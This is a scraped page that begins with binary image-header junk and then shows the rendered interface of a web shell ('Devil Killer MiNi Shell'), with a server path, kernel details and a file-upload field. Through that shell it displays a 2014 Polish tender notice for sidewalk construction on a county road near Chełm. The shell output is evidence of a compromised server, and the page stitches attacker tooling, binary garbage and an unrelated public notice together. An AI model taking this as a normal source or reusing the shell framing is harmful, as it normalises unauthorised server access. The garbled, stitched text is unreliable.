JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140220/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140220/34361-N-2014.html

<p class="kh_header"><b>Chełm: Budowa chodnika w miejscowościach Strachosław, Kamień, Kamień Kolonia w ciągu drogi powiatowej Ne 1842L- etap III</b><br>
<b>Numer ogłoszenia: 34361 - 2014; data zamieszczenia: 20.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Chełmski , Plac Niepodległości 1, 22-100 Chełm, woj. lubelskie, tel. 82 5627501, faks 82 5627510.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.powiat.chelm.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa chodnika w miejscowościach Strachosław, Kamień, Kamień Kolonia w ciągu drogi powiatowej Ne 1842L- etap III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zadania jest budowa chodnika w miesjcowościach Strachosław, Kamień, kamień Kolonia w ciągu drogi powiatowej Nr 1842L- etap III, gmina Kamień.
Zakres robót obejmuje:
I.OBSŁUGA GEODEZYJNA:
1.Roboty pomiarowe przy liniowych robotach ziemnych- chodniki- 1,40  km
2.Inwentaryzacja geodezyjna powykonawcza- 1,40 km
II.CHODNIKI:
1.Mechaniczne wykonanie koryta na całej szerokości jezdni i chodników w gruncie kat. I-IV głębokości 20 cm- 2 119,14 m2
2.Mechaniczne wykonanie koryta na całej szerokości jezdni i chodników w gruncie kat. I-IV za każde dalsze 5 cm głębokości- 2 119,14  m2
3.Mechaniczne profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kat. I-IV- 2 119,14 m2
4.Warstwy odsączające z piasku w korycie lub na całej szerokości drogi, wykonanie i zagęszczanie mechanicznie - grubość warstwy po zagęszczeniu10 cm- 2 119,14 m2
5.Podbudowa z gruntu stabilizowanego cementem wykonywana sprzętem rolniczym - grubość podbudowy po zagęszczeniu 12  cm o RM= 2,5 MPa gruntocement z wytwórni betonów- 2 119,14 m2
6.Podbudowa z gruntu  stabilizowanego cementem wykonywana sprzętem rolniczym - za każdy dalszy 1 cm grubości podbudowy po zagęszczeniu o RM=2,5 MPa- - 2 119,14 m2
7.Rowki pod krawężniki i ławy krawężnikowe o wymiarach 20 x 20 cm w gruncie kat. III-IV- 1 342,37 m
8.Ława pod krawężniki betonowa z oporem o RM=5 MPa- 13,43 m3
9.Krawężniki betonowe wystająceo wymiarach 15 x 30 cm na podsypce cementowo- piaskowej- 1 342,37 m
10.Obrzeża betonowe o wymiarach 20x6 cm na podsypce piaskowej z wypełnieniem spoin zaprawą cementową- 1 678,49 m
11.Opór z gruntocementu o RM=5 MPa- 13,43 m3
12.Nawierzchnie z kostki brukowej betonowej o grubości 6 cm na podsypce cementowo- piaskowej w kolorze szarej  w tym 20 % kolor czerwony- 2 119,14 m2
III.ZJAZDY PUBLICZNE I CHODNIK O WZMOCNIONEJ KONSTRUKCJI:
1.Mechaniczne wykonanie koryta na całej szerokości jezdni i chodników w gruncie kat. I- IV głębokości 20 cm- 566,72 m2
2.Mechaniczne wykonanie koryta na całej szerokości jedni i chodników w gruncie kat. I-IV za każde dalsze 5 cm głębokości- 566,72 m2
3.Mechaniczne profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kat. I-IV- 566,72 m2
4.Warstwy odsączające z piasku na poszerzeniach, wykonanie ręczne, zagęszczanie mechaniczne- grubość warstwy po zagęszczeniu 10 cm- 566,72 m2
5.Podbudowa z gruntu stabilizowanego cementem wykonywana sprzętem rolniczym - grubość podbudowy  po zagęszczeniu 12 cm o RM=5 MPa- 566,72 m2
6.Podbudowa z gruntu stabilizowanego cementem wykonywana sprzętem rolniczym- za każdy dalszy 1 cm grubości podbudowy po zagęszczeniu RM=5 MPa- 566,72  m2
7.Podbudowa z kruszywa łamanego - warstwa dolna o grubości po zagęszczeniu 15 cm 0/31,50 mm- 566,72 m2
8.Nawierzchnie z kostki brukowej  betonowej o grubości 8 cm na podsypce cementowo- piaskowej w kolorze czerwonym- 566,72 m2
IV.OBRZEŻA TYP CIĘZKI:
1.Obrzeża betonowe o wymiarach 30x8 cm na podsypce piaskowej z wypełnieniem spoin zaprawą cementową- 65,40 m
2.Opór z gruntocementu o RM=5 MPa- 0,98 m3
V.ZJAZD W KILOMETRZE 2+949,62:
1.Mechaniczne wykonanie koryta na całej szerokości jezdni i chodników w gruncie kat. I-IV głębokości 20 cm- 18,34 m2
2.Mechaniczne wykonanie koryta na całej szerokości jezdni i chodników w gruncie kat. I-IV za dalsze 5 cm głębokości- 18,34 m2
3.Mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kat. I-IV- 18,34 m2
4.Podbudowa betonowa bez dylatacji- grubość warstwy po zagęszczeniu 12 cm z chudego betonu B-10- 18,34 m2
5.Podbudowa betonowa bez dylatacji- za każdy dalszy 1 cm grubości warstwy po zagęszczeniu z betonu B-20- 18,34 m2
6.Opór z gruntocementu o RM=5 MPa- 4,21 m2
7.Obrzeża betonowe o wymiarach 30x8 cm na podsypce piaskowej z wypełnieniem spoin zaprawą cementową- 280,34 m
8.Nawierzchnia z kostki kamiennej rzędowej o wysokości 16 cm na odsypce cementowo- piaskowej- 18,34 m2
VI.ZATOKI AUTOBUSOWE:
1.Mechaniczne wykonanie koryta na całej szerokości  jezdni i chodników w gruncie kat. I-IV głębokości 20 cm- 214,71 m2
2.Mechaniczne wykonanie koryta na całej szerokości jezdni i chodników w gruncie kat. I-IV za każde dalsze 5 cm głębokości- 214,71 m2
3.Mechaniczne profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kat. I-IV- 214,71 m2
4.Podbudowa  z gruntu stabilizowanego cementem wykonywana sprzętem rolniczym- grubość podbudowy po zagęszczeniu 12 cm o RM=1,5 MPa- 214,71 m2
5.Podbudowa z gruntu stabilizowanego cementem wykonywana sprzętem rolniczym - za każdy dalszy 1 cm grubości podbudowy  po zagęszczeniu o RM=1,5 MPa- 214,71 m2
6.Podbudowa z gruntu stabilizowanego cementem wykonywana sprzętem rolniczym- grubość podbudowy po zagęszczeniu 12 cm o RM= 5MPa- 214,71 m2
7.Podbudowa z gruntu stabilizowanego cementem wykonywana sprzętem rolniczym za każdy dalszy 1 cm grubości podbudowy po zagęszczeniu RM=5 MPa- 214,71 m2
8.Podbudowa z kruszywa łamanego - warstwa dolna o grubości po zagęszczeniu 15 cm o frakcji 0/31,50 mm- 214,71 m2
9.Podbudowa z kruszywa łamanego- warstwa dolna- za każdy dalszy 1 cm grubości po zagęszczeniu o frakcji 0/31,50 mm- 214,71 m2
10.Nawierzchnie z kostki brukowej betonowej o grubości 8 cm na podsypce cementowo piaskowej szara- 214,71 m2
VII.ZJAZDY INDYWIDUALNE:
1.Mechaniczne wykonanie koryta na całej szerokości  jezdni i chodników w gruncie kat. I-IV głębokości 20 cm- 275,42 m2
2.Mechaniczne wykonanie koryta na całej szerokości jezdni i chodników w gruncie kat. I-IV za każde dalsze 5 cm głębokości- 275,42 m2
3.Mechaniczne profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kat. I-IV- 275,42 m2
4.Podbudowa  z kruszywa naturalnego warstwa dolna o grubości po zagęszczeniu 20 cm  frakcja 0/31,50 mm- 275,42 m2
5. Podbudowa z gruntu stabilizowanego cementem wykonywana sprzętem rolniczym- grubość podbudowy po zagęszczeniu 12 cm o RM=2,5 MPa- 275,42 m2
6.Podbudowa z gruntu stabilizowanego cementem wykonywana sprzętem rolniczym - za każdy dalszy 1 cm grubości podbudowy  po zagęszczeniu o RM=2,5 MPa- 275,42 m2
7.Nawierzchnie z kostki brukowej betonowej o grubości 8 cm na podsypce cementowo piaskowej czerwona- 275,42 m2
VIII.ODBUDOWA SKARP I PRZEPUSTÓW PŁYTAMI AZUROWYMI:
1.Roboty ziemne wykonywane koparkami przedsiębiernymi o poj. łyżki 0,40 m3 w gr. kat. III z transportem urobku samochodami samowyładowczymi na odległości do 1 km- 14,00 m3
2.Podbudowa betonowa bez dylatacji - grubość warstwy po zagęszczeniu 12 cm beton B-10- 45,00 m2
3.Podbudowa betonowa bez dylatacji- za każdy dalszy 1 cm grubości warstwy po zagęszczeniu beton B-10- 45,00 m2
4.Ułożenie płyt ażurowych na skarpach- 40,00 m2
IX.ODBUDOWA NAWIERZCHNI PRZY KRAWĘŻNIKU:
1.Nawierzchni z tłucznia kamiennego- warstwa dolna z kamienia podkładowego- grubość po zagęszczeniu 14 cm frakcja 0/31,50 mm- 118,95 m2
2.Nawierzchnia z tłucznia kamiennego- warstwa dolna z kamienia podkładowego- każdy dalszy 1 cm grubości po zagęszczeniu frakcja 0/31,50 mm- 118,95 m2
3.Remont cząstkowy nawierzchni bitumicznej mieszanką mineralno- asfaltową- 14,28 t
X.ZNAKI DROGOWE:
1.Zdejmowanie tablic znaków drogowych zakazu, nakazu, ostrzegawczych, informacyjnych- 2,00 szt.
2.Demontaż słupków oznakowania istniejącego według projektu organizacji ruchu- 2,00 szt. 
3.Słupki do znaków drogowych z rur stalowych o śr. 70 mm- 13,00 szt.
4.Przymocowanie tablic znaków drogowych zakazu, nakazu, ostrzegawczych, informacyjnych o powierzchni do 0,3 m2według projektu organizacji ruchu - 15,00 szt.
5.Tabliczki wraz z przymocowaniem według projektu organizacji ruchu- 2,00 szt.
XI.OZNAKOWANIE I URZĄDZENIA BRD:
1.Mechaniczne malowanie linii na skrzyżowaniach i przejściach dla pieszych farba chlorokauczukową według projektu organizacji ruchu- 93,60 m2
2.Bariery ochronne stalowe jednostronne o masie 39,00 kg/m typ olsztyński po obu stronach przepustu- 24,00 m
XII.REGULACJA PIONOWA SKRZYNEK WODOCIĄGOWYCH: regulacja pionowa studzienek dla zaworów wodociągowych- 4,00 szt. 
XIII.ROBOTY ZIEMNE: oczyszczenie rowów z namułu o grub. 30 cm z wyprofilowaniem skarp rowu- 150,00 m
XIV.URZĄDZENIA BRD: bariery ochronne typ olsztyński- 24,00 m
XV.CIEKI PODCHODNIKOWE (Z KORYTEK DROGOWYCH):
1.Ścieki z prefabrykatów betonowych o grubości 15 cm na podsypce piaskowej o wymiarach 15x50x60 cm- 28,00 m
2.Ławy fundamentowe betonowe, prostokątne szerokości do 0,60 m- ręczne układanie betonu C12/15 gr. 15 cm- 0,23 m3
XVI.CIEK PODCHODNIKOWY (KRATKA + PRZYKANALIK):
1.Ławy fundamentowe betonowe, prostokątne szerokości do 0,60 m- ręczne układanie betonu C12/15 pod krąg gr. 15 cm- 0,92 m3
2.Studnie rewizyjne z kręgów betonowych o śr. 500 mm w gotowym wykopie o głębokości 3 m kratka żeliwna ściekowa uliczna o wym. 0,40x0,60- 4,00 stud.
3.Studnie rewizyjne z kręgów betonowych o śr. 500 mm w gotowym wykopie za każde 0,50 m różnicy głęb.- 4,00 stud.
4.Kanały z rur PVC łączonych na wcisk o śr. zewn. 200 mm- 12,00 m
XVII.	CIEK PRZYKRAWĘŻNIKOWY Z KORYTEK DROGOWYCH:
1.Ławy fundamentowe betonowe, prostokątne szerokości do 0,60 m- ręczne układanie betonu C12/15- 50,67 m3
2.Ścieki z prefabrykatów betonowych o grubości 15 cm na podsypce piaskowej o wym. 15x50x60 cm- 338,00 m
XVIII.WYCINKA DZREW + KARCZOWANIE KRZAKÓW:
1.Ścinanie drzew piłą mechaniczną (śr. 26-35 cm)- 17,00 szt. 
2.Ręczne ścinanie i karczowanie zagajników średniej gęstości dotyczy całego pasa drogowego na odcinku budowy chodnika- 0,70 ha. 
Szczegółowy zakres robót i warunki realizacji określa dokumentacja techniczna, tj. w szczególności:
1.Przedmiar robót.
2.Szczegółowa specyfikacja techniczna wykonania i odbioru robót.
Roboty budowlane zostaną wykonane z materiałów Wykonawcy
Wykonawca udzieli Zamawiającemu na wykonany przedmiot zamówienia pisemnej gwarancji na okres 24 miesięcy, licząc od daty odbioru końcowego robót budowlanych. 
W ramach zamówienia do obowiązków Wykonawcy należy:
1.Wykonanie przedmiotu zamówienia zgodnie z dokumentacją techniczną, szczegółową specyfikacją techniczną wykonania i odbioru robót, przedmiarem robót i zasadami wiedzy technicznej przy zastosowaniu obowiązujących przepisów   i warunków technicznych.
2.Zabezpieczenie placu budowy wraz z bezpośrednim sąsiedztwem prowadzonych prac zgodnie z obowiązującymi zasadami bezpieczeństwa i ochrony zdrowia.
3.Opracowanie projektu czasowej zmiany organizacji ruchu na czas wykonywania przedmiotu zamówienia wraz z uzyskaniem opinii organu zarządzającego ruchem na terenie powiatu chełmskiego.
4.Zapewnienie ciągłości ruchu  w trakcie prowadzenia robót.
5.Zabezpieczenie oraz utrzymanie wszelkich elementów bezpieczeństwa ruchu  wprowadzonych na podstawie projektu organizacji ruchu na czas wykonywania przedmiotu zamówienia (oznakowania, wygrodzeń, itp.) w sposób zapewniający ich widoczność i czytelność.
6.Uporządkowanie placu budowy.
7.Wykonanie inwentaryzacji geodezyjnej powykonawczej
8.Wykonanie, pokrycie kosztów wszystkich badań, pomiarów, ekspertyz niezbędnych do realizacji zadania i dla udokumentowania wymaganej ilości wykonanych robót, a także wbudowanych materiałów. Wszystkie opinie i wyniki badań muszą być wykonane przez specjalistyczne laboratorium branżowe.
9.Dostarczenie Zamawiającemu wszystkich dokumentów  niezbędnych do oceny prawidłowego wykonania robót..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.95.33.00-5, 45.23.31.61-5.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający wymaga wniesienia wadium w wysokości  5 000,00 zł (słownie: pięć tysięcy złotych) do dnia i godziny otwarcia licytacji.
2.Termin otwarcia licytacji zostanie dokładnie określony w zaproszeniu do składania ofert przesłanym każdemu Wykonawcy dopuszczonemu do udziału w licytacji, z tym, że otwarcie licytacji nastąpi nie wcześniej niż 5 dni od dnia przekazania zaproszenia.
3.Wykonawca wnosi wadium w formie określonej w art. 45 ust. 6 ustawy.
4.Wadium wniesione w pieniądzu należy wpłacić na rachunek bankowy Zamawiającego:PKO BP SA O / Chełm Nr 25 1020 1563 0000 5902 0013 7349      z dopiskiem wadium-  Budowa chodnika w miejscowościach Strachosław, Kamień, Kamień Kolonia w ciągu drogi powiatowej Nr 1842L- etap III, gmina Kamień. Wadium uważa się za wniesione , jeżeli kwota wadium znajdzie się na rachunku bankowym Zamawiającego przed otwarciem licytacji. 
5.Dowód wniesienia wadium powinien  zostać dostarczony do Zamawiającego do dnia i godziny otwarcia licytacji.  
6.Zamawiający dokona zatrzymania bądź zwrotu wadium zgodnie z treścią art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia Wykonawca winien wykazać roboty budowlane z okresu ostatnich 5 lat przed upływem  terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu,   a jeżeli okres prowadzenia działalności  jest krótszy-  w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz winien załączyć dowody dotyczące najważniejszych robót, określające czy roboty zostały wykonane w sposób należyty a także wskazujące czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Warunek będzie spełniony gdy Wykonawca dowiedzie, że wśród wykazanych robót znajdują się  1 robota budowlaną w zakresie budowy lub  przebudowy chodników lub parkingów lub  ciągów pieszo- jezdnych lub  placów manewrowych lub postojowych lub zatok autobusowych z kostki brukowej (betonowej) o zakresie min.1 500,00 m2.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania odpowiednim potencjałem technicznym Wykonawca winien wykazać dysponowanie zasobami:
1.Koparka- 	1 szt.
2.Płyta wibracyjna-1 szt.
3.Samochód samowyładowczy-1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca winien wykazać dysponowanie osobami:- 1 osobą do pełnienia funkcji Kierownika budowy branży drogowej posiadającą ważne uprawnienia budowlane do kierowania robotami budowlanymi w branży drogowej oraz min. 24 miesięczny staż pracy na stanowisku kierownika budowy  lub kierownika robót przy realizacji robót branży drogowej. Uprawnienia budowlane do kierowania robotami w branży drogowej powinny być wydane zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane. W przypadku nabycia uprawnień budowlanych w innym kraju niż Polska będą także uznawane kwalifikacje zawodowe nabyte w państwach członkowskich Unii Europejskiej oraz państwach Europejskiego Obszaru Gospodarczego (European Economic Area- EEA) i Konfederacji Szwajcarskiej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca polega  na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków  zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia,  w szczególności przedstawiając w tym celu pisemne zobowiązanie  tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.  
